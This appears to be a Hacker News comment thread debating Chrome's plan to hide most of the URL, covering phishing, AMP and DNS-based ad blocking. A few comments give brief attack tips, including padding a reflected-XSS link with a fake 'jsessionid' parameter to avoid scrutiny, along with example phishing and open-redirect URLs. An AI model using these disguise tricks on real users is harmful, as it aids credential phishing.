Is that a meaningful piece of learning, though? I’ve been doing webdev since the 1990s and still look up character codes if I need them.


I think the value is not in memorizing such trivia; for a 7 years old it might be discovering the pattern of data encoding and its why and how. It opens all sort of paths of discovery in future for understanding software.

You'd be surprised how often veteran developers fail to grasp intermediate Unicode concepts (surrogate pairs, for instance) probably since they skipped over (or was not curious enough about) implementation details of such abstractions.


Sure, but it's the curiosity about how things work under the hood that matters. If he sees [ being replaced with %5B,he'll ask why it does that. And that leads to learning.


Are you gatekeeping a 7 year old? Learning about character encoding from first principles is an awesome accomplishment.


I’m saying learning character encoding doesn’t support this:

> Needlessly hiding technical details from kids is going to limit their learning.

I watch kids learning circuitry via redstone in Minecraft on iOS and Xbox - walled gardens, yet impressive learning nonetheless.


I agree kids can learn useful stuff in Minecraft, no doubt.

But when I was his age, all I had was MS-DOS 3.3. And I had to CD around to various directories, DIR *.EXE to remember the names of executables, etc. It was an environment that exposed more technical details, and kids who are predisposed to learn technical details learn a lot just by using it. Windows 10, doesn't promote the learning of technical details to anywhere near the same extent.

(I try to make up for it a bit. I introduced him to DOSBox.)


Wouldn’t it be better to be able to devote limited learning time to more useful things than locating oddly named executables, though?

It is a mistake to conflate “it was harder for me” with “I learned more”.

My kids can program more complicated stuff in Minecraft than I could at their age. Part of that is having a tool that’s fun and abstracts away the boring bits.


> Part of that is having a tool that’s fun and abstracts away the boring bits.

What is "boring" varies from person to person.

I know, when our son plays Minecraft Java Edition, he likes to play it with the debug screen (F3) on.

He doesn't understand what most of the details on that screen mean, although he is learning a few. (He was asking me to explain what X, Y and Z coordinates were.) But, even if he doesn't understand most of it, he still likes it, and probably sooner or later he'll ask me more questions about it.


When he told me this, I thought he was talking about ASCII, but I had to actually double-check with "man ascii", because 5B/5D sounded familiar but wasn't 100% sure he was right.

But the point is not that he memorises the ASCII table. The value is that he learns that computers internally represent letters/punctuation as numbers. The underlying concept is what's important, and the learning of specific values is mainly useful as a way of learning and reinforcing that underlying concept.


Yep! Kids learn by observing.


Firefox became quite fast again after Quantum. For those of us who never "bought into" the whole Chrome ecosystem, there's always been adequate alternatives. Will check out: https://www.palemoon.org/


They have quite an interesting conversation on github: https://old.reddit.com/r/linux/comments/7w61aw/pale_moon_rem...

I'd stay clear of that project and use mainstream Firefox instead. And afaik they still don't support WebExtensions.


I currently run firefox developer edition - gives me access to custom extensions.


Suppose there never was an URL you could share.

Suppose you always had to tell people to 'Google it'

Suppose 'I feel lucky' was always the default, and the result was sold to the highest bidder.


Safari has been this way since 2014. I've never seen any pushback on Apple doing it over the past six years.

It's genuinely a benefit for the vast, vast majority of users, where the only important piece of information really is the domain name, to check which site you're actually on. And for more info, you can just click. Copying the URL becomes no more difficult.

The URL path beyond the domain is as useful to most people as an IP address, in other words not at all -- it's just noise. And displaying noise is bad UX. Pretty much only website developers and administrators and SEO people care about the full URL. Granted, there are a lot of those people here on HN, so I understand the pushback, but we're not most users.

But at the end of the day, I don't understand why people seem totally fine with Safari doing this, but not Google?


As long as you see the full url when you hover/click on the bar, I am all for it as well.

If find some of reactions on this ridiculously hyperbolic "biggest attack on the web in years" ? seriously ?

I get it, Google is a gigantic monster that does not necessarily act in its users best interests, but that does not mean we need to bring the pitchfork each time they launch an app update.


If recent history with AMP has shown anything, it is that yes, we need to bring our pitchforks every time.

And also precisely because of AMP, this might be a very dangerous step towards blurring the lines between original and AMP pages.


On that note, I noticed recently that Google search result links (on Firefox?) get rewritten. That is, you see the actual page URL when you hover over the link, but it's changed to their own redirect URL as soon as you click it.

I'm sure they've always been tracking these search result clicks, but I think this is a somewhat new behavior, and I find it highly deceiving.


Chrome sends back your click 'behind the scenes', whereas Firefox does not, so Google forces you to click through their link so they can track your activity (and if you hit the back button, you also jump through their redirect)

Ublock Origin can block this behavior. Here's a posting with links to more resources on hyperlink-auditig

https://github.com/gorhill/uBlock/wiki/Dashboard:-Settings#d...


The people who use Safari is exactly the demographic that this change targets. Chrome users includes most developers who are the ones to complain.


I’m a developer. I use safari/WebKit for 95% of my browsing. You can enable the full address among a bunch of other excellent developer settings and move on with life with a browser that works great.


Developers are <1% of users - anything outside of dev tools is not changed with them in mind.


I’m in favor of full URL, but frankly didn’t notice until just now that I haven’t enabled Safari’s Show full website address preference.


I strongly disagree. Ordinary users I interact with either understand the basic concept of the URL or understand it after an initial explanation. It becomes empowering to them in ways I often do not anticipate.


If I recall there was some grumbling, but Apple being Apple, they do what they want.


But why can't this be a toggle or user setting like in Safari? Why is it a 1-true-google-way of doing things when clearly there are users who want to keep it (even if its just web developers)?


How do you know it won't be a toggle?

Right now it is a setting to enable in Chrome.

What makes you think that once it becomes default, the switch won't remain to be able to turn it off?

Chrome is built by developers. Presumably, they pay attention to what developers need from it. Which is why their debugging tools overall are so amazing.

Perhaps you should withold criticism of what you assume they'll do until they, you know, actually do it.


Reading URLs is actually really hard - even for experts. This video covers the problems well: https://www.youtube.com/watch?v=0-wB1VY3Nrc

This is bad for web security, since the registerable domain is the part you have to trust, but it's surprisingly difficult to figure out that part.

However I feel a bit uneasy about this since URLs are important and tell you where you are on a website. I prefer Firefox's approach which emphasises the registerable domain in the URL bar and fades out the rest of it, making it easier to spot the important bit. However it's still quite subtle - it could do with being a clearer distinction.


[flagged]


The video points out things like: how do you spot an eTLD? There's .com, but what about .co.uk? .github.io? Do you know all the exceptions? There's basically a database of them and you just have to know them to correctly interpret the security origin of the domain.


The way we use DNS (reversed) does make URLs kind of confusing for specificity, like:

https://specific.more.less.example.com/less/more/specific.ht...


I am going to go against Hanlon's razor here, but doesn't the slow push away from URLs benefit Google?

A few years later, instead of type news.ycombinator.com, you would need to search for "hacker news", scroll through the ads and then click on the link.

So it could be a slow transition to inserting a sort of interstitial ads inter your browsing.


I'm against this. But: it's 2020 and still a huge number of people I deal with every day type the name of our product into their search bar and then login at the first site returned. Most don't know the difference between a browser and a specific website. It's all just a big Smush to them apparently.


Remember when ReadWriteWeb wrote an article about a new Facebook login feature and users who usually Googled facebook login and pressed the first result got all confused and angry? I don't think the average user today is any more knowledgeable about URLs.

https://www.theguardian.com/technology/blog/2010/feb/11/face...


Services that cater to the very lowest tier of users should also factor in the risk of that if they want to reap the rewards too. And it's a great thing about an open platform such as the Internet.

I'm also against this in theory, but in practice I don't care much. We shall see.


It's $current_year is never a good excuse. $people not knowing stuff should not mean that everyone should get dumber to match $people.


URLs are confusing though. I am a veteran URL user and I learned something about them from this thread. Hiding them isn't necessarily better but many replies here seem to be denying that they are imperfect.


Imperfect and stable+standardized is preferable to unstable+unstandardized, in my opinion.


I agree. What I'm saying is clearly if you want to defeat this then a totally different approach needs to turn up because 20 years of mainstream internet use has resulted in zero user education.


I doubt that. You mention in your parent post that people don't know the difference between a browser and a specific site. I think most people do. At least if they use more then 1 site.


What I meant was that in a tech support context if you ask people what browser they're using they will often say something like "I went to Product Name" or "I'm on Product Name". Then ask them what actual address they visited or again ask them what browser they are using and they will say something like "I went to the Internet".

I am not calling anybody dumb. I'm saying they don't care and don't know there is any reason to care.


I still doubt that. People know how to enter URLs. They chose not to because it's oftentimes easier just to search where you want to go. Google Chrome hasn't gotten this market dominance by people not caring. It has to installed actively.

Even if, showing the URL bar changes nothing for them, so why hide it?


It feels like a long time ago people were talking of computing in context of educating and empowering users rather than accessing commercial services.


> $people not knowing stuff should not mean that everyone should get dumber to match $people.

Exactly. We should push on the opposite direction (educate people and make the concepts clearer).


This, along with the inability of disabling the async dns feature in the latest Chrome for desktop versions (thus making pihole/adguard irrelevant), makes me accelerate the change to another browser.


I hate to be the person who's like "you're holding it wrong" but your usage of DNS is incorrect according to the RFCs. All configured DNS servers are assumed to serve the same content. The idea of every DNS request "trying" the first server, timing out, and then the next, and the next is a calcified implementation detail.

A DNS client looking at the list of servers, and marking the speed and reachability of each server is the most basic optimization. It makes no sense for clients to add n seconds to every request for every unreachable DNS sever.

The async DNS feature using Chrome's internal DNS client which behaves differently than glibc and so pihole appears to not work. Chrome is not injecting its own DNS servers into the mix or whitelisting anything, it always uses your system's DNS servers, it just looks them all up in parallel which it is allowed (and encouraged) to do by the RFC.

Make sure all your configured DNS servers are pihole and everything will work.


Also not opening external applications links in incognito mode if that is the last (or the only) chrome window with a focus. It still drives me nuts.


I'm curious - why do you want to disable it?


Because I want to use my own DNS server and block ads at the DNS level rather than the browser level. With this move, Google has effectively white listed adsense / adwords to not be blocked regardless of the network settings of the device.


this is confusing.

https://www.xda-developers.com/fix-dns-ad-blocker-chrome/

seems that the problem is not async itself, but that chrome ignores the system DNS settings and uses googles own DNS servers instead.


That is a good point, I might have been pointing at the wrong issue in Chrome. I have only seen this behavior happen since 2-3 days ago and all my research pointed me to async dns being the culprit. I am really eager to find out if this can be disabled in any way, but my Chrome time has come to an end with recent developments.


Seems like a bug. Some environments cannot reach external DNS servers, so it would break resolution in general. This happened before and was fixed: https://bugs.chromium.org/p/chromium/issues/detail?id=265970 I couldn't find any report for the current issue though - maybe you should start one.


Chrome doesn't respect DNS settings anyway. I have in my resolv.conf:

    search my.home
And entering hostname of my server would just googles the hostname of my server, instead of trying a lookup and googling only afterwards (or never, I don't see why the browser should contact the owner just because I mistyped the url).


This point merits an explanation. The file /etc/resolv.conf is a configuration file for the `dns` NSS module used by the glibc resolver.

Google's async DNS feature uses Chrome's own internal DNS resolver which doesn't call gethostname(). It would be incorrect for Chrome to parse this file and attempt to "respect" your settings because NSS is a series of black-box system-specific modules. If you removed the dns module from /etc/nsswitch.conf then resolv.conf wouldn't even enter the mix on your system and then Chrome would do the wrong thing. If the dns module behaved differently on your system and /etc/resolv.conf was actually /etc/resolv.json or /etc/resolver.conf then Chrome would again do the wrong thing.

When resolving a name applications have two choices, either look up the name with glibc, send the request through the NSS gauntlet of black-box modules and take whatever it returns of perform the DNS request itself and ignore everything on the system. Any sort of hybrid approach would be more confusing.


Hmm, so does this mean /etc/hosts will no longer work either, etc.? That's handled by the same glibc function too.


Why not just use a syntax highlighting approach on the address bar? Protocol one color, domain another, slashes one color, query params another, etc.


It's a pretty obvious solution, especially to any programmer.

I'm having a hard time thinking of a situation where you have information, some more important and some less, where the correct solution is to delete the less important information. It still has importance!


Using color to convey information is very difficult to make it be accessible while still working with themes and being aesthetically pleasing at the same time.


What you described is more like highlighting the function signature in one color and the entire body in another. Syntax highlighting for the URL would be more like domain/subdomain in one color, emphasising query fields in one color and params in another, with colors potentially varying potentially based on their type/significance.

That might help make the URL more readable but again doesn't really help if the relevant parts of the path/query string for trust isn't immediately apparent.


Because Ux/ui designers and art inclined people would lose their mind


or breadcrumb trail as someone else said.


I'd personally prefer if ot wasn't hidden but after first hamd experiencing non tech savvy family members trying to decipher the query part and some accusing someone of trying to hack them I'm for the change. The whole query string philosophy is such an outdated hack. Today it's just thousands of tracking qieries.

What I hate is how poorly they worded when websites use http instead of https. It says "connection not secure" which makes people think there is a hacker somewhere hacking their connection. What they should have done and must correct is to make the wording "this website is not following safety guidelines". I'm tired if explaining.


Maybe it should say "connection not secured". It would be much more factual.


> trying to decipher the query part and some accusing someone of trying to hack them I'm for the change

At least back in the day they will have the opportunity to learn what a query string is and that no, nobody is hacking anyone.

However with these stupid changes there will no longer be an opportunity to learn even if you wanted to.


If you dumb down users, they become dumber.


People should not educate themselves on the details of implementation of the browser or internet as much as they don't educate themselves about the details of the car. We have many other complex systems with simple end user goals and people don't have to care about the details. The Americans don't even have the gear shift


What is the conclusion of your hypothesis though, if users become unable to find and validate their services ie. like online banking, from possible fishing sites or otherwise hacked pages. Knowledge is power. So we need to be careful about making people impoverished or too reliant on centrally commanded portals, or prepare to face the consequences.


Querystring an outdated hack?

Look pilgrim, that's the standard for you right there. It's called RFC3986.


3.4. Query

   The query component contains non-hierarchical data that, along with
   data in the path component (Section 3.3), serves to identify a
   resource within the scope of the URI's scheme and naming authority
   (if any).
Today they are used for tracking strings more than anything else and that's also the reason why they are hiding them. People didn't complain if they were used as search queries


Wonder how long it’ll be before it shows the proxied URL on amp pages...


I think they're already trying to force that at the network level instead of the browser level using signed exchanges.

https://developers.google.com/web/updates/2018/11/signed-exc...


Signed exchanges are quite neat actually, they do not seem to depend on AMP at all. You could even use them to get arbitrary static resources hosted via IPFS in a seamless way.


For sure, just as AMP is also a neat technology that can be used by companies other than google.

But my understanding is that they intend to use signed exchanges specifically for their amp URLs, finally finishing their efforts of forcing people to go to google.com without them ever having realized it.


Ffs. I’m going back to gopher at some point.


Which is soon to be usurped by Google because it starts with “Go.”



Gopher over SNA/OSI is worse than WWW/TCP/IP in terms of ability to publish UGC.


That's a feature


Google Network Control Program?


Or just switch to Firefox...


Firefox is going down the toilet as well. Lots of me-too-isms are appearing.

Really my point was in jest. I think we need to trash the entire www and start again with something content only focused and hard same-origin policy and far far far lighter than what we have. I tried browsing the web on a dual core celeron N3010 recently and it was unusable on all mainstream browsers.


Wouldn't surprise me. Users are the product, what's to expect.


Yes, walling the garden has been the goal all along.


A couple of Google Chrome devs talk about the issues surrounding the readability of urls and their security implications and possible solutions in an episode of their podcast[0]. I think they make a compelling argument for hiding most of the url in part to prevent phishing however I do think they should allow this behaviour to be toggled via a flag.

[0] https://youtu.be/0-wB1VY3Nrc


Do you know if this information is somewhere more accessible than a 20 minute video?

Hiding the https and www is already frustrating enough, and this change would make Chrome barely usable for my purposes.


The claimed purpose is basically just to prevent phishing.

They explain a number of reasons why it is difficult for people to extract from a URL the part which is relevant to security, ie. the bit that affects who has authority over the page and how your cookies will be separated by the browser. The cookie sharing actually had some rules I didn't know about as a non-web developer but experienced URL user. They show how every browser is already going some way towards this but they all have some problems, for example Safari shows the full domain not just the important part.


Looks like this will be great for reflected XSS attacks. Even advanced users will not be able to notice there's something weird going on outside of the domain name part of the URL. Perfect!

Basically any page on the website with this vulnerability will be useable to show a fake login page, and user will not even notice he's not on the /login, but on some weird path + ?_sort=somejavascript

Not that it's that hard to clean up url via history api after you get access to the page via XSS atm, but there's still some short period of time where the full url is shown in such a case, that may provoke suspicion.


Stick "?jsessionid=<random 80 character string>" in front of the xss and no one will ever look.


Their goal is full AMP dominance. Just look at these evil guys faces. It's clear enough that they're going to pass their frustrations onto you, no matter what.


Conspiracy theory: This change is dictated by the Google AMP team that wants to take over the world without us knowing


> Conspiracy theory: This change is dictated by the Google AMP team that wants to take over the world without us knowing

I was just about to write this but I don't necessarily think it's that far off.

With signed exchanges, AMP pages have the ability to hide the fact you're accessing content through Google [1]. In 2016 Google wrote about testing 'mobile-first indexing' because more people are using mobile devices than desktop browsers [2].

[1] https://developers.google.com/search/docs/guides/about-amp#a... [2] https://webmasters.googleblog.com/2016/11/mobile-first-index...

If Google can control the URL narrative (keeping users from bouncing off AMP pages) it's just one more ability for them to be MITM.


I wonder if they’ll eventually hide the URL path from extensions (for security) and serve ads off google.com. Even serving ads from somewhere under google.com/amp would probably cause problems for ad blockers. Or maybe extensions see the rewritten URL only, so CanSignHttpExchanges is a way of changing third party trackers and ads into first party.

Also nice to see DigiCert helping them out, but I’m not surprised with how DigiCert’s product lineup isn’t much more than a test of how much of a sucker you are.



I disagree with the decision strongly, but I'm a developer and probably a "power user". A casual user might not even know what a URL is.

Do you know there's a staggering amount of users who type "google.com" into Google?


> A casual user might not even know what a URL is.

And this will add a few extra hoops for them to jump through before they learn, so that they'll never have to leave the reassuring embrace of Google's ad trackers. How convenient. :)


I mean... not to be contrarian but does the average user need to know a URL?

Do I need to know an address to drive my car somewhere?

My knowledge that a place exists and I want to go there is sufficient to get me there, without having the physical address memorized.

As a power-user I obviously navigate through URL far more than the average user, but I am not convinced that say a 50 year old nurse using my web software needs to ever touch a URL even a single time, or that it would be beneficial to her user experience to even know what it is.


Maybe a slightly better analogy: with the URL, if you know your address, you can go straight there. With a car/driving, it would be like instant teleportation. Not knowing the URL means using Google search, and not knowing the street address means driving around and seeing a bunch of billboards. Removing the URL bar is like removing the ability to teleport so you can make sure people see the billboards.


That's implying there's an "after they learn" - even without those hoops.


Knowledge does not guarantee action, but there will be no action without knowledge.


It's not unimaginable to me that there will be no knowledge anyway, regardless of whether the URL is shown or not.


Hiding the URL won't make people learn what it is. And what great thing can be accomplished when one changes it - this is how I learned a lot of things when WWW was starting.

Are we promoting idiocracy now? If someone doesn't know what it is he/she should find out, or live with not knowing.


A large part of the reason for this confusion might be Google's long-standing efforts to blur the line between search and plain URL-based navigation, starting with integrating search into the location field in Chrome – Firefox and Safari[1] used to separate them, which makes the concepts clearer and avoids sending URLs and (local history) searches to the search provider unintentionally.

[1] http://toastytech.com/guis/osx14safari2.png


I remember this being the magical thing together with less wasted vertical space that made me switch to Chrome back in the day, it was (and still is) so simple! Always had the search field taking up precious space in Firefox but never really using it because it was a different mental route, like this is smart but why am I not using it?

I think it is down to having to consciously decide to search before starting to type instead of just start typing, if you couldn't remember the URL just misspell it and search and it works, a more specific page throw in another word and you get the correct page as a search result essentially every time.


Looking at that issue of consciously deciding whether to search from another angle, if I haven't decided yet, why would I want to inform Google of what I'm typing? Perhaps it's a private address of a private server with private information in the query string.

In any case, if I do decide to search, the search field is just a ctrl+k away, so the additional convenience of combining the fields never seemed that great to me. (But for Google, of course, it's a very convenient property of this design that everything the user types happens to end up being sent to Google.)


No sorry i just know of people that type google into bing.com ;)


Does anyone remember AOL keywords? I worry that this might be laying the ground to do something like that. Maybe it's not planned or maybe it's only an option they want on the table but obviously they have the incentive to do some kind of "Google keywords" and this would certainly help with that.


I can see the arguments for why this might be advantageous security-wise. I just hope they make it easy to disable (and it remains possible to disable in future) for those of us who are technically minded and are able to read URLs.


To enable the old behaviour you need to edit a browser flag. I don't know of any of the flags that disable Google 'engagement' features which have been kept around over the long term. The flags I've had to set in the past have all been removed after a few months.

Two recent examples off the top of my head are the recommended stories on the new tab page and the ability to disable images appearing in the omnibox.


what security arguments are there that are not also solved by highlighting the domain instead of removing critical information?


I would say that removing URL is also bad UI - if user sees that URL changes with navigation, then it is possible to guess that it can be copied and pasted to give a link for current page.

If the URL bar would offer full URL for copy/paste, but show only the domain, then the feature of full URL copy/paste is hidden.


Or you just hit the share button? I think copy-and-paste would be considered the bad UX if it was new idea today.

I think user-visible links would be considered bad UX if it was presented today.

“Alright then you copy this opaque hundred character string into your chat window, make sure you get everything after the dollar sign, or strip it out. Depends on the site.”

Copy and paste is the lowest common denominator of IPC.


Or you just hit the share button?

...which does who-knows-what behind your back, including possibly communicating with a third-party to see if you are "properly authorised to share", and meanwhile allowing them to subtly insert themselves into monitoring everyone's communication?

Do NOT want.


I believe that Google has evaluated it very carefully from all the possible perspectives and the net outcome for them was positive, so they went with it.

I assume that they care more about blurring the line between the "Google"-served internet and the regular internet than about losing 2% of Chrome's usage rate.


> positive

positive for them, not necessarily anyone else.


Google is grooming next generation of users. It wants to be the Internet, the way IE (the E logo) used to be Internet to many users.

Can you imagine removing house numbers from Street addresses? "Where did you buy that? On Main Str., but there wasn't any number..."

If the URLs are ugly it's not Google's place to regulate that, but website's owner.

If this is to protect users, then instead of removing information, add and/or make it more user friendly.


The click/edit to show full url is a good and intuitive design. A lot of websites just have terribly designed urls, with tons of obscure nesting paths and ?x=y flags that users don't care about. Here's what I got from searching the word "duck" in chrome search bar:

    https://www.google.com/search?q=duck&oq=duck&aqs=chrome..69i57j69i59j0l3j46j0j69i65.864j0j7&sourceid=chrome&ie=UTF-8
why would I care about the op, aps, sourceid and ie? If I really have to know the aqs value I can just simply click and have it.


why would I care about the op, aps, sourceid and ie?

Because they may be tracking identifiers...

...which I could argue is precisely why they don't want you to know. I always sanitise URLs when I share them with others, because of such things.


> I always sanitise URLs when I share them with others, because of such things.

Same here. Before sharing URLs with others, I often experiment with removing parameters to find the minimal URL that still works, and then share that.


The sad part is that Mozilla is probably going to follow suit just like they did with the previous attacks on the bar.


This is a setting, in flags (i.e. not in regular settings, the whole section in the ui is marked 'experiments') in the dev/canary builds of the browser. It defaults to off. The article (and even its slightly HN-improved title) is pure ragebait.


The setting will go away, as such things always do.


There are actually tons of Chrome experiments that never launch 100% and have their flag removed. They are experiments for a reason. This lets the Chrome team iterate on things and try it out.


They don't 'always do' and the article is still flagworthy ragebait. There are dog farts that serve intellectual curiosity than this type of thing.


I've revised the title to reflect this a little better. The discussion indicates community interest in the topic that maybe exceeds the impact of this particular story, but it's genuine interest, and I don't think it's just rage.


While title is ragebait for sure, Google intent to eliminate URL and replace it with "something better" was clearly stated more than year ago. This article tells us they didn't give up on their efforts.


I actually don't mind this for the gen pop. For them, showing the URL is a bit like showing the path to the current process in the title bar.

As a dev, hiding the HTTPS prefix is already irritating especially when copying the URL. If you copy the whole URL, you're fine. If you manually select part of it, starting with the domain, the prefix doesn't copy.

I expect this upcoming change will exacerbate this kind of problem.

Don't we just need a persistent dev mode that doesn't mess around with the URL?


I see absolutely no benefit whatsoever for the general population. Dumbing things down for people does not make technology easier, it makes people dumber.

If your goal is to make people dumb and compliant, this is a great idea. Of course we know that's what Google's goal is, because that's what keeps the money flowing.


> Dumbing things down for people does not make technology easier

That's a bit of an absurd claim. Should my grandparents just be using luakit instead of Safari? Are you sure you aren't projecting your experience of technology onto people with a totally different experience of it to you?

>I see absolutely no benefit whatsoever for the general population

A benefit is reduced probability of being phished.


> Dumbing things down for people does not make technology easier, it makes people dumber.

It’s important to understand, while we, the users of Hacker News may find it odd that everyone doesn’t know these things, perspective will tell us they probably have other priorities for their time–and that’s OK.

I don’t know, and honestly don’t care to know or prioritize the deep and intricate complexities of how deodorant or shampoo is made—or how it’s distributed, made safe for human use, etc. This does not make me dumber, it frees up my mental time for other priorities.

The same can be said for the 1000s of things I use daily from toothpaste to refrigerators to stop-lights to dentistry. While I may have a general idea how these processes happen, my knowledge is by no means expansive.

A deep understanding of everything should absolutely not be a requirement to function in a society.

Is Google doing this for bad reasons? Maybe. But let’s not pretend as if simplifying things makes people dumber. It’s freeing up our limited resources.

Expecting everyone to know deep details on the thousands of things they use everyday would absolutely bog us down into uselessness.

One of the smartest things we ever did was to free ourselves from needing an intense understanding of everything we use throughout the day.

As you move throughout today, notice the thousands of things you interact with which you have little idea about what went into it.


I spent an extra 10-15 minutes trying to debug an issue with Shibboleth last week with two other devs that had never set it up on a server before.

Why? Because we weren't forcing https yet in IIS and while I thought I had told it to go to the https site I was either wrong or it had changed. The address bar notification no longer jumps out at me.

I second a persistent dev mode / not continuing to remove address data from the address bar by default.


There is no company that is more well equipped to detect fraudulent domains than Google. They have the most data, most engineers, must anything that matters here.

This is something else.

I'm actually using Edge and it's not terrible. Multiple choices in the market is good.


Software should be designed for the user experience.

Including features that help support, diagnose, log, test, debug, and develop are part of that, especially for software that provides a platform. For platforms, developers are one kind of user.

However, developer features should be out-of-the-way by default. Anything beyond the domain is not meaningful to end-users and should be hidden by default in the same way other developer tools are.


This is likely about replacing URIs with "web identity", i.e. certificate-signed content. The browser address bar would display the publisher name instead of site name.

2018 discussion with Google's Chrome demo at AMP event: https://news.ycombinator.com/item?id=17923156


Isn't this a good example of "feature creep"? I dont see any reason why it makes a browser more useful when the URL is partially hidden.

It reminds me of a company which developed a product which was more or less done. So the SWE manager and the product manager made up new (pretty useless) features just to tell their bosses the devs are busy and the team must stay intact.


To try and think of an upside for the user, it might help people detect phishing by making the domain name more prominent.

I've seen phishing sites like support.google.com.8n.cn where the right side (the most important) just disappears into the /path. Though this attack is even more brilliant on mobile devices that truncate the right hand side and leave with you with "support.google.com...".

Aside, I encourage fellow HNers to purposely visit seedy websites in a VM without an ad blocker. Especially if you haven't been exposed to crappy behavior since the popup/under days. Great way to see the state of hostile web practices, like unblockable popups and fake macOS notifications.


If they want the domain to be more prominent, they could also just make it... more prominent. Highlight it more and separate it.


This is what firefox does


sounds to me like "support.google.com.8n.cn" would still show up as "support.google.com..." on mobile, even when Chrome hides the URL, wouldn't it?


It makes their serving of AMP less transparent, which is a good thing for them. I guess.


I'm starting to wonder when the EU will raise the anti-trust flag. It seems obvious to me that Google tries to use it's start page market dominance to become the only webpage served on the Internet.



This is the only economically rational explanation I can think of. Unless it ties into other user-abusive projects they have planned.


What about reducing phishing? Seems more obvious


Why assume good intentions when economic incentives (which we already know they have) already explain it?


What are the other browsers' intentions then, who are doing almost the same thing? What about the economic incentive of generally increasing trust in the web and ecommerce, which is highly relevant to their core business?

Also consider the sibling comment about AMP - looks like they already have special behaviour for that so this is barely relevant.


Why assume good intentions when profit and lock-in already explain it?


Try moving in the other direction. Have the browser always show a little bit of the HTML code or some Javascript variables. Will that make it better or worse? What's the correct amount of internal coding information to display to all users? I don't think URLs are the sweet spot of important information without useless mess.


They don't do this for the benefit of the user, but to benefit themselves. Its all about making the web into google lah lah land where they control everything.


I increasingly find myself using other search engines when looking up political contents. Google's seems to be censored, or wheigthed in a way that gives it heavy political bias. I wish they would just give good search results, like they used to. Would be a lot less hassle.


That's the filter-bubble you're seeing. It's showing you things it thinks you'll engage with, and hiding things it thinks you won't, and the algorithm is too stupid to do that properly but they use it anyway.


Just to play the devil advocate, removing the url bar gives slightly more room to display the website.


It isn’t removing the url bar. It’s hiding the full address of the website in the URL box. Your screen real estate is exactly the same.


You are right, I should have read TFA.


Can see this being exploited in some fashion for phishing attacks..


Shouldn't it actually help, seeing as the domain name is the important part? Now users can't get tricked into interpreting the path as part of the domain name.


Even if it does help in some cases, it's hiding the path, which in itself could cause other vectors of attacks. Just host malicious pages on legit sites where you can host and phish for clicks to it, faking the home page look and feel.


While I don’t welcome hiding full URLs at all and won’t use any browser that doesn’t allow to turn that off easily, this matter is more or less orthogonal to phishing.

If domain-owning organization fails to prevent a third party from hosting a phishing site under a path or a subdomain, that third party is likely well-positioned to deface the existing pages. With a subtle alteration (scripts that capture credentials and transmit them out), the existing pages grant an attacker all of the users with no extra effort—as opposed distributing a link to a fake page, convincing the user that the page is legit, and in the end getting a fraction of the user base.


For phishing to work you need a similar domain if you want to maximize the conned people. Copying the path from the attacked website is the easiest part.

I can even argue that if you take away the path from the URL, then it's actually easier to spot a phishing website since all you see is the domain if you don't hover over the address bar.


Can you be specific?


This change visibly hides subdomains. On some domains subdomains represent different sites from different unrelated authors. That being said it is of trivial effort to clone a site to capture sensitive information hosted under any subdomain with a valid HTTPS certificate.


Don't think that would be the case. If anything it would only make the user focus on the domain to realize that it might not be legit.


You can be at peace knowing that you re reading news.ycombimator.com


Actually the opposite as _only_ the domain is fully visible


Wow, this is epic scumbaggery. I still stick to Chrome because of all the syncing features it has across many of the devices I use, PC, Mobile, Mac and my own laptop. I remember at sometime in the past they hid URL query parameters by default, until the user clicked on the address bar.

It's so obvious this move makes it harder for people to copy-paste links, which is a common practice, and moreover misleads people when they try to know what page they're on lol.

test.com/profile or test.com/dashboard/favorites

or many other pages that look like `home pages` of websites are now going to be misinterpreted as actual home pages themselves by users because of this witchery.

If Google thinks this is a good move in that they can get people to land on websites through Search and not directly, it's an undoubtable massive deal-breaker for people like me.


Firefox can sync between different devices too. More, you can even self-host your sync server if you want.


"Showing the full URL may detract from the parts of the URL that are more important to making a security decision on a webpage".

Oh, really? As a security-aware user I really want to see the full URL to make sure it doesn't look something like https://big-vulnerable-site.com/?redirect_url=http://my-mali.... I fail to see a single use case where showing only the hostname or the domain increases the security of the browsing experience. But by now I'm also quite use to Google's way of shamelessly lying their way through.


> I fail to see a single use case where showing only the hostname or the domain increases the security of the browsing experience.

For you, a power user with presumably years (decades?) using the web and general technical fluency, sure. This doesn't particularly benefit you.

The person it benefits is a beginner (possibly a permanent beginner), who's needs to be taught to look at the domain name of websites before typing in their password. This is already an unfamiliar and uncomfortable concept for a lot of people, and forcing them to parse a long string of line noise to find the thing they're supposed to check makes it worse.

It's very difficult to for technical experts to put ourselves in the shoes of a permanent beginner. We like using computers. A lot of them hate it, but have to do it to pay their taxes or make appointments with their doctor or see photos of their relatives. We think the idea of protecting ourselves from attackers is neat, because it makes us feel in control. A lot of them think it's horrifying, because they feel out of control and exposed. Adding extra little steps, or little opportunities for confusion, has a big impact on these folks, and they need all the help they can get.


Huh? If I was trying to get people to see that paypal.com.myevilsite.info/paypal/auth/secure

then having myevilsite.com be the most prominent thing seems like a win.


So i think the future of mobile computing is that mobile operating system will be just a browser. This is Google first step. It's a good news, not bad news if they're heading that way.


I guess Linux distros should start supplying patched Chromium then.


I doubt that Ubuntu moving to having Chrome being a snap is a good sign for them doing the right thing with a custom Chromium.


If their goal is really to help detect fraudulent sites (the sorts of google.com.notahacker.tk), they can just show the domain in a more prominent way -- they're already deemphasizing the part of the URL after the domain name anyway.

This is clearly not their motive.

What Google is trying to do here is to drift the web from its most iconic components: the URL. This is the biggest threat to the web that we loved for so many years.


I assume the goal is to make sure that people never remember the URL and always use Google to get anywhere. Most people probably already do, but maybe increasing their number from 80% to 90% is still worth it.

If this is indeed the real motivation, the next obvious target would be bookmarks. What can be done about them? Replace the bookmarked URLs by Google queries? It would be an interesting functionality if Google could look at a page and give you the smallest query that would have returned exactly this page as a first result. Then bookmark the query instead of the URL. And if the search results change in the future... I suppose, it would be possible to spin this as a feature. ("Self-improving bookmarks" perhaps? You don't have to worry about link rot; with latest Google self-improving bookmarks, your bookmark will always point to the best existing page on given topic!)


The bookmarking functions in chrome are already extremely weak, I guess for the reason you point out. No tagging, only folders, results when searching don’t get top position in the omnibar.

Bookmarking is one of the areas where firefox is clearly superior.


Same for the history, I much prefer it in Safari than Chrome. It looks like Chrome make it worthless on purpose so that we use Google instead of looking through our history.


And what’s worse is that none of the other Chromium browsers change it, it really is the worst history/bookmarking UI out there. Firefox’s isn’t much better as it feels plucked straight out of 2003.

It made the Safari 13 Extension-pocalypse so much harder to bear. Every browser I can pick from has something important I have to compromise on.


Don't give them any ideas.


> Google could look at a page and give you the smallest query that would have returned exactly this page as a first result

